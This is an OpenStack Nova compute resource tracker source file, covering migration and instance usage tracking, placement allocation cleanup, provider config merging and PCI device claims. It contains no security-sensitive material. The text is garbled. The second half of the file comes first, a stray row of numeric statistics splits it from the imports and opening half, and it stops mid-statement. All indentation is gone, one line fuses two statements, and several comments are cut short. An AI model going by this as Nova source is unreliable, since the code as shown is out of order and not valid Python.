migration.uuid, itype.flavorid, instance=instance)
elif outbound and not tracked:
# instance migrated, but record usage for a possible revert:
itype = self._get_flavor(instance, 'old_', migration)
numa_topology = self._get_migration_context_resource(
'numa_topology', instance, prefix='old_')
# We could be racing with confirm_resize setting the
# instance.old_flavor field to None before the migration status
# is "confirmed" so if we did not find the flavor in the outgoing
# resized instance we won't track it.
if itype:
LOG.debug('Starting to track outgoing migration %s with '
'flavor %s', migration.uuid, itype.flavorid,
instance=instance)
if itype:
cn = self.compute_nodes[nodename]
usage = self._get_usage_dict(
itype, instance, numa_topology=numa_topology)
if self.pci_tracker and sign:
self.pci_tracker.update_pci_for_instance(
context, instance, sign=sign)
self._update_usage(usage, nodename)
if self.pci_tracker:
obj = self.pci_tracker.stats.to_device_pools_obj()
cn.pci_device_pools = obj
else:
obj = objects.PciDevicePoolList()
cn.pci_device_pools = obj
self.tracked_migrations[uuid] = migration
def _update_usage_from_migrations(self, context, migrations, nodename):
filtered = {}
instances = {}
self.tracked_migrations.clear()
# do some defensive filtering against bad migrations records in the
# database:
for migration in migrations:
uuid = migration.instance_uuid
try:
if uuid not in instances:
# Track migrating instance even if it is deleted but still
# has database record. This kind of instance might be
# deleted during unfinished migrating but exist in the
# hypervisor.
migration._context = context.elevated(read_deleted='yes')
instances[uuid] = migration.instance
except exception.InstanceNotFound as e:
# migration referencing deleted instance
LOG.debug('Migration instance not found: %s', e)
continue
# Skip migation if instance is neither in a resize state nor is
# live-migrating.
if (not _instance_in_resize_state(instances[uuid]) and not
_instance_is_live_migrating(instances[uuid])):
LOG.debug('Skipping migration as instance is neither '
'resizing nor live-migrating.', instance_uuid=uuid)
continue
# filter to most recently updated migration for each instance:
other_migration = filtered.get(uuid, None)
# NOTE(claudiub): In Python 3, you cannot compare NoneTypes.
if other_migration:
om = other_migration
other_time = om.updated_at or om.created_at
migration_time = migration.updated_at or migration.created_at
if migration_time > other_time:
filtered[uuid] = migration
else:
filtered[uuid] = migration
for migration in filtered.values():
instance = instances[migration.instance_uuid]
# Skip migration (and mark it as error) if it doesn't match the
# instance migration id.
# This can happen if we have a stale migration record.
# We want to proceed if instance.migration_context is None
if (instance.migration_context is not None and
instance.migration_context.migration_id != migration.id):
LOG.info("Current instance migration %(im)s doesn't match "
"migration %(m)s, marking migration as error. "
"This can occur if a previous migration for this "
"instance did not complete.",
{'im': instance.migration_context.migration_id,
'm': migration.id})
migration.status = "error"
migration.save()
continue
try:
self._update_usage_from_migration(context, instance, migration,
nodename)
except exception.FlavorNotFound:
LOG.warning("Flavor could not be found, skipping migration.",
instance_uuid=instance.uuid)
continue
def _update_usage_from_instance(self, context, instance, nodename,
is_removed=False):
"""Update usage for a single instance."""
uuid = instance['uuid']
is_new_instance = uuid not in self.tracked_instances
# NOTE(sfinucan): Both brand new instances as well as instances that
# are being unshelved will have is_new_instance == True
is_removed_instance = not is_new_instance and (is_removed or
instance['vm_state'] in vm_states.ALLOW_RESOURCE_REMOVAL)
if is_new_instance:
self.tracked_instances.add(uuid)
sign = 1
if is_removed_instance:
self.tracked_instances.remove(uuid)
self._release_assigned_resources(instance.resources)
sign = -1
cn = self.compute_nodes[nodename]
stats = self.stats[nodename]
stats.update_stats_for_instance(instance, is_removed_instance)
cn.stats = stats
# if it's a new or deleted instance:
if is_new_instance or is_removed_instance:
if self.pci_tracker:
self.pci_tracker.update_pci_for_instance(context,
instance,
sign=sign)
# new instance, update compute node resource usage:
self._update_usage(self._get_usage_dict(instance, instance),
nodename, sign=sign)
# Stop tracking removed instances in the is_bfv cache. This needs to
# happen *after* calling _get_usage_dict() since that relies on the
# is_bfv cache.
if is_removed_instance and uuid in self.is_bfv:
del self.is_bfv[uuid]
cn.current_workload = stats.calculate_workload()
if self.pci_tracker:
obj = self.pci_tracker.stats.to_device_pools_obj()
cn.pci_device_pools = obj
else:
cn.pci_device_pools = objects.PciDevicePoolList()
def _update_usage_from_instances(self, context, instances, nodename):
"""Calculate resource usage based on instance utilization. This is
different than the hypervisor's view as it will account for all
instances assigned to the local compute host, even if they are not
currently powered on.
"""
self.tracked_instances.clear()
cn = self.compute_nodes[nodename]
# set some initial values, reserve room for host/hypervisor:
cn.local_gb_used = CONF.reserved_host_disk_mb / 1024
cn.memory_mb_used = CONF.reserved_host_memory_mb
cn.vcpus_used = CONF.reserved_host_cpus
cn.free_ram_mb = (cn.memory_mb - cn.memory_mb_used)
cn.free_disk_gb = (cn.local_gb - cn.local_gb_used)
cn.current_workload = 0
cn.running_vms = 0
instance_by_uuid = {}
for instance in instances:
if instance.vm_state not in vm_states.ALLOW_RESOURCE_REMOVAL:
self._update_usage_from_instance(context, instance, nodename)
instance_by_uuid[instance.uuid] = instance
return instance_by_uuid
def _remove_deleted_instances_allocations(self, context, cn,
migrations, instance_by_uuid):
migration_uuids = [migration.uuid for migration in migrations
if 'uuid' in migration]
# NOTE(jaypipes): All of this code sucks. It's basically dealing with
# all the corner cases in move, local delete, unshelve and rebuild
# operations for when allocations should be deleted when things didn't
# happen according to the normal flow of events where the scheduler
# always creates allocations for an instance
try:
# pai: report.ProviderAllocInfo namedtuple
pai = self.reportclient.get_allocations_for_resource_provider(
context, cn.uuid)
except (exception.ResourceProviderAllocationRetrievalFailed,
ks_exc.ClientException) as e:
LOG.error("Skipping removal of allocations for deleted instances: "
"%s", e)
return
allocations = pai.allocations
if not allocations:
# The main loop below would short-circuit anyway, but this saves us
# the (potentially expensive) context.elevated construction below.
return
read_deleted_context = context.elevated(read_deleted='yes')
for consumer_uuid, alloc in allocations.items():
if consumer_uuid in self.tracked_instances:
LOG.debug("Instance %s actively managed on this compute host "
"and has allocations in placement: %s.",
consumer_uuid, alloc)
continue
if consumer_uuid in migration_uuids:
LOG.debug("Migration %s is active on this compute host "
"and has allocations in placement: %s.",
consumer_uuid, alloc)
continue
# We know these are instances now, so proceed
instance_uuid = consumer_uuid
instance = instance_by_uuid.get(instance_uuid)
if not instance:
try:
instance = objects.Instance.get_by_uuid(
read_deleted_context, consumer_uuid,
expected_attrs=[])
except exception.InstanceNotFound:
# The instance isn't even in the database. Either the
# scheduler _just_ created an allocation for it and we're
# racing with the creation in the cell database, or the
# instance was deleted and fully archived before we got a
# chance to run this. The former is far more likely than
# the latter. Avoid deleting allocations for a building
# instance here.
LOG.info("Instance %(uuid)s has allocations against this "
"compute host but is not found in the database.",
{'uuid': instance_uuid},
exc_info=False)
continue
# NOTE(mriedem): A cross-cell migration will work with instance
# records across two cells once the migration is confirmed/reverted
# one of them will be deleted but the instance still exists in the
# other cell. Before the instance is destroyed from the old cell
# though it is marked hidden=True so if we find a deleted hidden
# instance with allocations against this compute node we just
# ignore it since the migration operation will handle cleaning up
# those allocations.
if instance.deleted and not instance.hidden:
# The instance is gone, so we definitely want to remove
# allocations associated with it.
LOG.debug("Instance %s has been deleted (perhaps locally). "
"Deleting allocations that remained for this "
"instance against this compute host: %s.",
instance_uuid, alloc)
# We don't force delete the allocation in this case because if
# there is a conflict we'll retry on the next
# update_available_resource periodic run.
self.reportclient.delete_allocation_for_instance(context,
instance_uuid,
force=False)
continue
if not instance.host:
# Allocations related to instances being scheduled should not
# be deleted if we already wrote the allocation previously.
LOG.debug("Instance %s has been scheduled to this compute "
"host, the scheduler has made an allocation "
"against this compute node but the instance has "
"yet to start. Skipping heal of allocation: %s.",
instance_uuid, alloc)
continue
if (instance.host == cn.host and
instance.node == cn.hypervisor_hostname):
# The instance is supposed to be on this compute host but is
# not in the list of actively managed instances. This could be
# because we are racing with an instance_claim call during
# initial build or unshelve where the instance host/node is set
# before the instance is added to tracked_instances. If the
# task_state is set, then consider things in motion and log at
# debug level instead of warning.
if instance.task_state:
LOG.debug('Instance with task_state "%s" is not being '
'actively managed by this compute host but has '
'allocations referencing this compute node '
'(%s): %s. Skipping heal of allocations during '
'the task state transition.',
instance.task_state, cn.uuid, alloc,
instance=instance)
else:
LOG.warning("Instance %s is not being actively managed by "
"this compute host but has allocations "
"referencing this compute host: %s. Skipping "
"heal of allocation because we do not know "
"what to do.", instance_uuid, alloc)
continue
if instance.host != cn.host:
# The instance has been moved to another host either via a
# migration, evacuation or unshelve in between the time when we
# ran InstanceList.get_by_host_and_node(), added those
# instances to RT.tracked_instances and the above
# Instance.get_by_uuid() call. We SHOULD attempt to remove any
# allocations that reference this compute host if the VM is in
# a stable terminal state (i.e. it isn't in a state of waiting
# for resize to confirm/revert), however if the destination
# host is an Ocata compute host, it will delete the allocation
# that contains this source compute host information anyway and
# recreate an allocation that only refers to itself. So we
# don't need to do anything in that case. Just log the
# situation here for information but don't attempt to delete or
# change the allocation.
LOG.warning("Instance %s has been moved to another host "
"%s(%s). There are allocations remaining against "
"the source host that might need to be removed: "
"%s.",
instance_uuid, instance.host, instance.node, alloc)
def delete_allocation_for_evacuated_instance(self, context, instance, node,
node_type='source'):
# Clean up the instance allocation from this node in placement
cn_uuid = self.compute_nodes[node].uuid
if not self.reportclient.remove_provider_tree_from_instance_allocation(
context, instance.uuid, cn_uuid):
LOG.error("Failed to clean allocation of evacuated "
"instance on the %s node %s",
node_type, cn_uuid, instance=instance)
def delete_allocation_for_shelve_offloaded_instance(self, context,
instance):
self.reportclient.delete_allocation_for_instance(
context, instance.uuid, force=True)
def _verify_resources(self, resources):
resource_keys = ["vcpus", "memory_mb", "local_gb", "cpu_info",
"vcpus_used", "memory_mb_used", "local_gb_used",
"numa_topology"]
missing_keys = [k for k in resource_keys if k not in resources]
if missing_keys:
reason = _("Missing keys: %s") % missing_keys
raise exception.InvalidInput(reason=reason)
def _get_flavor(self, instance, prefix, migration):
"""Get the flavor from instance."""
if migration.is_resize:
return getattr(instance, '%sflavor' % prefix)
# NOTE(ndipanov): Certain migration types (all but resize)
# do not change flavors so there is no need to stash
# them. In that case - just get the instance flavor.
return instance.flavor
def _get_usage_dict(self, object_or_dict, instance, **updates):
"""Make a usage dict _update methods expect.
Accepts a dict or an Instance or Flavor object, and a set of updates.
Converts the object to a dict and applies the updates.
:param object_or_dict: instance or flavor as an object or just a dict
:param instance: nova.objects.Instance for the related operation; this
is needed to determine if the instance is
volume-backed
:param updates: key-value pairs to update the passed object.
Currently only considers 'numa_topology', all other
keys are ignored.
:returns: a dict with all the information from object_or_dict updated
with updates
"""
def _is_bfv():
# Check to see if we have the is_bfv value cached.
if instance.uuid in self.is_bfv:
is_bfv = self.is_bfv[instance.uuid]
else:
is_bfv = compute_utils.is_volume_backed_instance(
instance._context, instance)
self.is_bfv[instance.uuid] = is_bfv
return is_bfv
usage = {}
if isinstance(object_or_dict, objects.Instance):
is_bfv = _is_bfv()
usage = {'memory_mb': object_or_dict.flavor.memory_mb,
'swap': object_or_dict.flavor.swap,
'vcpus': object_or_dict.flavor.vcpus,
'root_gb': (0 if is_bfv else
object_or_dict.flavor.root_gb),
'ephemeral_gb': object_or_dict.flavor.ephemeral_gb,
'numa_topology': object_or_dict.numa_topology}
elif isinstance(object_or_dict, objects.Flavor):
usage = obj_base.obj_to_primitive(object_or_dict)
if _is_bfv():
usage['root_gb'] = 0
else:
usage.update(object_or_dict)
for key in ('numa_topology',):
if key in updates:
usage[key] = updates[key]
return usage
def _merge_provider_configs(self, provider_configs, provider_tree):
"""Takes a provider tree and merges any provider configs. Any
providers in the update that are not present in the tree are logged
and ignored. Providers identified by both $COMPUTE_NODE and explicit
UUID/NAME will only be updated with the additional inventories and
traits in the explicit provider config entry.
:param provider_configs: The provider configs to merge
:param provider_tree: The provider tree to be updated in place
"""
processed_providers = {}
provider_custom_traits = {}
for uuid_or_name, provider_data in provider_configs.items():
additional_traits = provider_data.get(
"traits", {}).get("additional", [])
additional_inventories = provider_data.get(
"inventories", {}).get("additional", [])
# This is just used to make log entries more useful
source_file_name = provider_data['__source_file']
# In most cases this will contain a single provider except in
# the case of UUID=$COMPUTE_NODE, it may contain multiple.
providers_to_update = self._get_providers_to_update(
uuid_or_name, provider_tree, source_file_name)
for provider in providers_to_update:
# $COMPUTE_NODE is used to define a "default" rule to apply
# to all your compute nodes, but then override it for
# specific ones.
#
# If this is for UUID=$COMPUTE_NODE, check if provider is also
# explicitly identified. If it is, skip updating it with the
# $COMPUTE_NODE entry data.
if uuid_or_name == "$COMPUTE_NODE":
if any(_pid in provider_configs
for _pid in [provider.name, provider.uuid]):
continue
# for each provider specified by name or uuid check that
# we have not already processed it to prevent duplicate
# declarations of the same provider.
current_uuid = provider.uuid
if current_uuid in processed_providers:
raise ValueError(_(
"Provider config '%(source_file_name)s' conflicts "
"with provider config '%(processed_providers)s'. "
"The same provider is specified using both name "
"'%(uuid_or_name)s' and uuid '%(current_uuid)s'.") % {
'source_file_name': source_file_name,
'processed_providers':
processed_providers[current_uuid],
'uuid_or_name': uuid_or_name,
'current_uuid': current_uuid
}
)
# NOTE(sean-k-mooney): since each provider should be processed
# at most once if a provider has custom traits they were
# set either in previous iteration, the virt driver or via the
# the placement api. As a result we must ignore them when
# checking for duplicate traits so we construct a set of the
# existing custom traits.
if current_uuid not in provider_custom_traits:
provider_custom_traits[current_uuid] = {
trait for trait in provider.traits
if trait.startswith('CUSTOM')
}
existing_custom_traits = provider_custom_traits[current_uuid]
if additional_traits:
intersect = set(provider.traits) & set(additional_traits)
intersect -= existing_custom_traits
if intersect:
invalid = ','.join(intersect)
raise ValueError(_(
"Provider config '%(source_file_name)s' attempts "
"to define a trait that is owned by the "
"virt driver or specified via the placment api. "
"Invalid traits '%(invalid)s' must be removed "
"from '%(source_file_name)s'.") % {
'source_file_name': source_file_name,
'invalid': invalid
}
)
provider_tree.add_traits(provider.uuid, *additional_traits)
if additional_inventories:
merged_inventory = provider.inventory
intersect = (merged_inventory.keys() &
{rc for inv_dict in additional_inventories
for rc in inv_dict})
if intersect:
raise ValueError(_(
"Provider config '%(source_file_name)s' attempts "
"to define an inventory that is owned by the "
"virt driver. Invalid inventories '%(invalid)s' "
"must be removed from '%(source_file_name)s'.") % {
'source_file_name': source_file_name,
'invalid': ','.join(intersect)
}
)
for inventory in additional_inventories:
merged_inventory.update(inventory)
provider_tree.update_inventory(
provider.uuid, merged_inventory)
processed_providers[current_uuid] = source_file_name
def _get_providers_to_update(self, uuid_or_name, provider_tree,
source_file):
"""Identifies the providers to be updated.
Intended only to be consumed by _merge_provider_configs()
:param provider: Provider config data
:param provider_tree: Provider tree to get providers from
:param source_file: Provider config file containing the inventories
:returns: list of ProviderData
"""
# $COMPUTE_NODE is used to define a "default" rule to apply
# to all your compute nodes, but then override it for
# specific ones.
if uuid_or_name == "$COMPUTE_NODE":
return [root.data() for root in provider_tree.roots
if os_traits.COMPUTE_NODE in root.traits]
try:
providers_to_update = [provider_tree.data(uuid_or_name)]
# Remove the provider from absent provider list if present
# so we can re-warn if the provider disappears again later
self.absent_providers.discard(uuid_or_name)
except ValueError:
providers_to_update = []
if uuid_or_name not in self.absent_providers:
LOG.warning(
"Provider '%(uuid_or_name)s' specified in provider "
"config file '%(source_file)s' does not exist in the "
"ProviderTree and will be ignored.",
{"uuid_or_name": uuid_or_name,
"source_file": source_file})
self.absent_providers.add(uuid_or_name)
return providers_to_update
def build_failed(self, nodename):
"""Increments the failed_builds stats for the given node."""
self.stats[nodename].build_failed()
def build_succeeded(self, nodename):
"""Resets the failed_builds stats for the given node."""
self.stats[nodename].build_succeeded()
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def claim_pci_devices(self, context, pci_requests, instance_numa_topology):
"""Claim instance PCI resources
:param context: security context
:param pci_requests: a list of nova.objects.InstancePCIRequests
:param instance_numa_topology: an InstanceNumaTopology object used to
ensure PCI devices are aligned with the NUMA topology of the
instance
:returns: a list of nova.objects.PciDevice objects
"""
result = self.pci_tracker.claim_instance(
context, pci_requests, instance_numa_topology)
self.pci_tracker.save(context)
return result
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def unclaim_pci_devices(self, context, pci_device, instance):
"""Deallocate PCI devices
:param context: security context
:param pci_device: the objects.PciDevice describing the PCI device to
be freed
:param instance: the objects.Instance the PCI resources are freed from
"""
self.pci_tracker.free_device(pci_device, instance)
self.pci_tracker.save(context)
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def allocate_pci_devices_for_instance(self, context, instance):
"""Allocate instance claimed PCI resources
:param context: security context
:param instance: instance object
"""
self.pci_tracker.allocate_instance(instance)
self.pci_tracker.save(context)
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def free_pci_device_allocations_for_instance(self, context, instance):
"""Free instance allocated PCI resources
:param context: security context
:param instance: instance object
"""
self.pci_tracker.free_instance_allocations(context, instance)
self.pci_tracker.save(context)
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def free_pci_device_claims_for_instance(self, context, instance):
"""Free instance claimed PCI resources
:param context: security context
:param instance: instance object
"""
self.pci_tracker.free_instance_claims(context, instance)
self.pci_tracker.save(context)
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def finish_evacuation(self, instance, node, migration):
instance.apply_migration_context()
# NOTE (ndipanov): This save will now update the host and node
# attributes making sure that next RT pass is consistent since
# it will be based on the instance and not the migration DB
# entry.
instance.host = self.host
instance.node = node
instance.save()
instance.drop_migration_context()
# NOTE (ndipanov): Mark the migration as done only after we
# mark the instance as belonging to this host.
if migration:
migration.status = 'done'
migration.save()
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def clean_compute_node_cache(self, compute_nodes_in_db):
"""Clean the compute node cache of any nodes that no longer exist.
:param compute_nodes_in_db: list of ComputeNode objects from the DB.
"""
compute_nodes_in_db_nodenames = {cn.hypervisor_hostname
for cn in compute_nodes_in_db}
stale_cns = set(self.compute_nodes) - compute_nodes_in_db_nodenames
for stale_cn in stale_cns:
# NOTE(mgoddard): we have found a node in the cache that has no
# compute node in the DB. This could be due to a node rebalance
# where another compute service took ownership of the node. Clean
# up the cache.
self.remove_node(stale_cn)
self.reportclient.invalidate_resource_provider(stale_cn)
| 47.190786
| 79
| 0.620055
|
import collections
import copy
from keystoneauth1 import exceptions as ks_exc
import os_traits
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_utils import excutils
import retrying
from nova.compute import claims
from nova.compute import monitors
from nova.compute import provider_config
from nova.compute import stats as compute_stats
from nova.compute import task_states
from nova.compute import utils as compute_utils
from nova.compute import vm_states
import nova.conf
from nova import exception
from nova.i18n import _
from nova import objects
from nova.objects import base as obj_base
from nova.objects import fields
from nova.objects import migration as migration_obj
from nova.pci import manager as pci_manager
from nova.pci import request as pci_request
from nova import rpc
from nova.scheduler.client import report
from nova import utils
from nova.virt import hardware
CONF = nova.conf.CONF
LOG = logging.getLogger(__name__)
COMPUTE_RESOURCE_SEMAPHORE = "compute_resources"
def _instance_in_resize_state(instance):
vm = instance.vm_state
task = instance.task_state
if vm == vm_states.RESIZED:
return True
if vm in [vm_states.ACTIVE, vm_states.STOPPED] and task in (
task_states.resizing_states + task_states.rebuild_states):
return True
return False
def _instance_is_live_migrating(instance):
vm = instance.vm_state
task = instance.task_state
if task == task_states.MIGRATING and vm in [vm_states.ACTIVE,
vm_states.PAUSED]:
return True
return False
class ResourceTracker(object):
def __init__(self, host, driver, reportclient=None):
self.host = host
self.driver = driver
self.pci_tracker = None
self.compute_nodes = {}
self.stats = collections.defaultdict(compute_stats.Stats)
self.tracked_instances = set()
self.tracked_migrations = {}
self.is_bfv = {} monitor_handler = monitors.MonitorHandler(self)
self.monitors = monitor_handler.monitors
self.old_resources = collections.defaultdict(objects.ComputeNode)
self.reportclient = reportclient or report.SchedulerReportClient()
self.ram_allocation_ratio = CONF.ram_allocation_ratio
self.cpu_allocation_ratio = CONF.cpu_allocation_ratio
self.disk_allocation_ratio = CONF.disk_allocation_ratio
self.provider_tree = None
self.assigned_resources = collections.defaultdict(
lambda: collections.defaultdict(set))
self.provider_configs = provider_config.get_provider_configs(
CONF.compute.provider_config_location)
self.absent_providers = set()
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def instance_claim(self, context, instance, nodename, allocations,
limits=None):
if self.disabled(nodename):
self._set_instance_host_and_node(instance, nodename)
return claims.NopClaim()
if instance.host:
LOG.warning("Host field should not be set on the instance "
"until resources have been claimed.",
instance=instance)
if instance.node:
LOG.warning("Node field should not be set on the instance "
"until resources have been claimed.",
instance=instance)
cn = self.compute_nodes[nodename]
pci_requests = instance.pci_requests
claim = claims.Claim(context, instance, nodename, self, cn,
pci_requests, limits=limits)
instance_numa_topology = claim.claimed_numa_topology
instance.numa_topology = instance_numa_topology
self._set_instance_host_and_node(instance, nodename)
if self.pci_tracker:
# NOTE(jaypipes): ComputeNode.pci_device_pools is set below
# in _update_usage_from_instance().
self.pci_tracker.claim_instance(context, pci_requests,
instance_numa_topology)
claimed_resources = self._claim_resources(allocations)
instance.resources = claimed_resources
# Mark resources in-use and update stats
self._update_usage_from_instance(context, instance, nodename)
elevated = context.elevated()
# persist changes to the compute node:
self._update(elevated, cn)
return claim
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def rebuild_claim(self, context, instance, nodename, allocations,
limits=None, image_meta=None, migration=None):
return self._move_claim(
context, instance, instance.flavor, nodename, migration,
allocations, move_type=fields.MigrationType.EVACUATION,
image_meta=image_meta, limits=limits)
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def resize_claim(
self, context, instance, flavor, nodename, migration, allocations,
image_meta=None, limits=None,
):
return self._move_claim(
context, instance, flavor, nodename, migration,
allocations, image_meta=image_meta, limits=limits)
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def live_migration_claim(
self, context, instance, nodename, migration, limits, allocs,
):
# Flavor and image cannot change during a live migration.
flavor = instance.flavor
image_meta = instance.image_meta
return self._move_claim(
context, instance, flavor, nodename, migration, allocs,
move_type=fields.MigrationType.LIVE_MIGRATION,
image_meta=image_meta, limits=limits,
)
def _move_claim(
self, context, instance, new_flavor, nodename, migration, allocations,
move_type=None, image_meta=None, limits=None,
):
image_meta = image_meta or {}
if migration:
self._claim_existing_migration(migration, nodename)
else:
migration = self._create_migration(
context, instance, new_flavor, nodename, move_type)
if self.disabled(nodename):
# compute_driver doesn't support resource tracking, just
return claims.NopClaim(migration=migration)
cn = self.compute_nodes[nodename]
new_pci_requests = pci_request.get_pci_requests_from_flavor(
new_flavor)
new_pci_requests.instance_uuid = instance.uuid
if instance.pci_requests:
for request in instance.pci_requests.requests:
if request.source == objects.InstancePCIRequest.NEUTRON_PORT:
new_pci_requests.requests.append(request)
claim = claims.MoveClaim(context, instance, nodename,
new_flavor, image_meta, self, cn,
new_pci_requests, migration, limits=limits)
claimed_pci_devices_objs = []
# migration to avoid stepping on that code's toes. Ideally,
if self.pci_tracker and not migration.is_live_migration:
claimed_pci_devices_objs = self.pci_tracker.claim_instance(
context, new_pci_requests, claim.claimed_numa_topology)
claimed_pci_devices = objects.PciDeviceList(
objects=claimed_pci_devices_objs)
claimed_resources = self._claim_resources(allocations)
old_resources = instance.resources
# constructor flow so the Claim constructor only tests whether
# resources can be claimed, not consume the resources directly.
mig_context = objects.MigrationContext(
context=context, instance_uuid=instance.uuid,
migration_id=migration.id,
old_numa_topology=instance.numa_topology,
new_numa_topology=claim.claimed_numa_topology,
old_pci_devices=instance.pci_devices,
new_pci_devices=claimed_pci_devices,
old_pci_requests=instance.pci_requests,
new_pci_requests=new_pci_requests,
old_resources=old_resources,
new_resources=claimed_resources)
instance.migration_context = mig_context
instance.save()
# Mark the resources in-use for the resize landing on this
# compute host:
self._update_usage_from_migration(context, instance, migration,
nodename)
elevated = context.elevated()
self._update(elevated, cn)
return claim
def _create_migration(
self, context, instance, new_flavor, nodename, move_type=None,
):
migration = objects.Migration(context=context.elevated())
migration.dest_compute = self.host
migration.dest_node = nodename
migration.dest_host = self.driver.get_host_ip_addr()
migration.old_instance_type_id = instance.flavor.id
migration.new_instance_type_id = new_flavor.id
migration.status = 'pre-migrating'
migration.instance_uuid = instance.uuid
migration.source_compute = instance.host
migration.source_node = instance.node
if move_type:
migration.migration_type = move_type
else:
migration.migration_type = migration_obj.determine_migration_type(
migration)
migration.create()
return migration
def _claim_existing_migration(self, migration, nodename):
migration.dest_compute = self.host
migration.dest_node = nodename
migration.dest_host = self.driver.get_host_ip_addr()
# NOTE(artom) Migration objects for live migrations are created with
# status 'accepted' by the conductor in live_migrate_instance() and do
# not have a 'pre-migrating' status.
if not migration.is_live_migration:
migration.status = 'pre-migrating'
migration.save()
def _claim_resources(self, allocations):
if not allocations:
return None
claimed_resources = []
for rp_uuid, alloc_dict in allocations.items():
try:
provider_data = self.provider_tree.data(rp_uuid)
except ValueError:
# If an instance is in evacuating, it will hold new and old
# allocations, but the provider UUIDs in old allocations won't
LOG.debug("Skip claiming resources of provider %(rp_uuid)s, "
"since the provider UUIDs are not in provider tree.",
{'rp_uuid': rp_uuid})
continue
for rc, amount in alloc_dict['resources'].items():
if rc not in provider_data.resources:
# assign this kind of resource class, such as 'VCPU' for
# now, otherwise the provider_data.resources will be
# populated with this resource class when updating
# provider tree.
continue
assigned = self.assigned_resources[rp_uuid][rc]
free = provider_data.resources[rc] - assigned
if amount > len(free):
reason = (_("Needed %(amount)d units of resource class "
"%(rc)s, but %(avail)d are available.") %
{'amount': amount,
'rc': rc,
'avail': len(free)})
raise exception.ComputeResourcesUnavailable(reason=reason)
for i in range(amount):
claimed_resources.append(free.pop())
if claimed_resources:
self._add_assigned_resources(claimed_resources)
return objects.ResourceList(objects=claimed_resources)
def _populate_assigned_resources(self, context, instance_by_uuid):
resources = []
# Get resources assigned to migrations
for mig in self.tracked_migrations.values():
mig_ctx = mig.instance.migration_context
# We might have a migration whose instance hasn't arrived here yet.
if not mig_ctx:
continue
if mig.source_compute == self.host and 'old_resources' in mig_ctx:
resources.extend(mig_ctx.old_resources or [])
if mig.dest_compute == self.host and 'new_resources' in mig_ctx:
resources.extend(mig_ctx.new_resources or [])
for uuid in self.tracked_instances:
resources.extend(instance_by_uuid[uuid].resources or [])
self.assigned_resources.clear()
self._add_assigned_resources(resources)
def _check_resources(self, context):
notfound = set()
for rp_uuid in self.assigned_resources:
provider_data = self.provider_tree.data(rp_uuid)
for rc, assigned in self.assigned_resources[rp_uuid].items():
notfound |= (assigned - provider_data.resources[rc])
if not notfound:
return
# or restarted.
resources = [(res.identifier, res.resource_class) for res in notfound]
reason = _("The following resources are assigned to instances, "
"but were not listed in the configuration: %s "
"Please check if this will influence your instances, "
"and restore your configuration if necessary") % resources
raise exception.AssignedResourceNotFound(reason=reason)
def _release_assigned_resources(self, resources):
if not resources:
return
for resource in resources:
rp_uuid = resource.provider_uuid
rc = resource.resource_class
try:
self.assigned_resources[rp_uuid][rc].remove(resource)
except KeyError:
LOG.warning("Release resource %(rc)s: %(id)s of provider "
"%(rp_uuid)s, not tracked in "
"ResourceTracker.assigned_resources.",
{'rc': rc, 'id': resource.identifier,
'rp_uuid': rp_uuid})
def _add_assigned_resources(self, resources):
if not resources:
return
for resource in resources:
rp_uuid = resource.provider_uuid
rc = resource.resource_class
self.assigned_resources[rp_uuid][rc].add(resource)
def _set_instance_host_and_node(self, instance, nodename):
# NOTE(mriedem): ComputeManager._nil_out_instance_obj_host_and_node is
# somewhat tightly coupled to the fields set in this method so if this
# method changes that method might need to be updated.
instance.host = self.host
instance.launched_on = self.host
instance.node = nodename
instance.save()
def _unset_instance_host_and_node(self, instance):
instance.host = None
instance.node = None
instance.save()
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def abort_instance_claim(self, context, instance, nodename):
self._update_usage_from_instance(context, instance, nodename,
is_removed=True)
instance.clear_numa_topology()
self._unset_instance_host_and_node(instance)
self._update(context.elevated(), self.compute_nodes[nodename])
def _drop_pci_devices(self, instance, nodename, prefix):
if self.pci_tracker:
# free old/new allocated pci devices
pci_devices = self._get_migration_context_resource(
'pci_devices', instance, prefix=prefix)
if pci_devices:
for pci_device in pci_devices:
self.pci_tracker.free_device(pci_device, instance)
dev_pools_obj = self.pci_tracker.stats.to_device_pools_obj()
self.compute_nodes[nodename].pci_device_pools = dev_pools_obj
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def drop_move_claim_at_source(self, context, instance, migration):
migration.status = 'confirmed'
migration.save()
self._drop_move_claim(
context, instance, migration.source_node, instance.old_flavor,
prefix='old_')
# NOTE(stephenfin): Unsetting this is unnecessary for cross-cell
# resize, since the source and dest instance objects are different and
# the source instance will be deleted soon. It's easier to just do it
instance.drop_migration_context()
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def drop_move_claim_at_dest(self, context, instance, migration):
# indicate that we no longer needs to account for usage on this host
migration.status = 'reverted'
migration.save()
self._drop_move_claim(
context, instance, migration.dest_node, instance.new_flavor,
prefix='new_')
instance.revert_migration_context()
instance.save(expected_task_state=[task_states.RESIZE_REVERTING])
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def drop_move_claim(self, context, instance, nodename,
flavor=None, prefix='new_'):
self._drop_move_claim(
context, instance, nodename, flavor, prefix='new_')
def _drop_move_claim(
self, context, instance, nodename, flavor=None, prefix='new_',
):
# Remove usage for an instance that is tracked in migrations, such as
# on the dest node during revert resize.
if instance['uuid'] in self.tracked_migrations:
migration = self.tracked_migrations.pop(instance['uuid'])
if not flavor:
flavor = self._get_flavor(instance, prefix, migration)
# Remove usage for an instance that is not tracked in migrations (such
# as on the source node after a migration).
# NOTE(lbeliveau): On resize on the same node, the instance is
# included in both tracked_migrations and tracked_instances.
elif instance['uuid'] in self.tracked_instances:
self.tracked_instances.remove(instance['uuid'])
if flavor is not None:
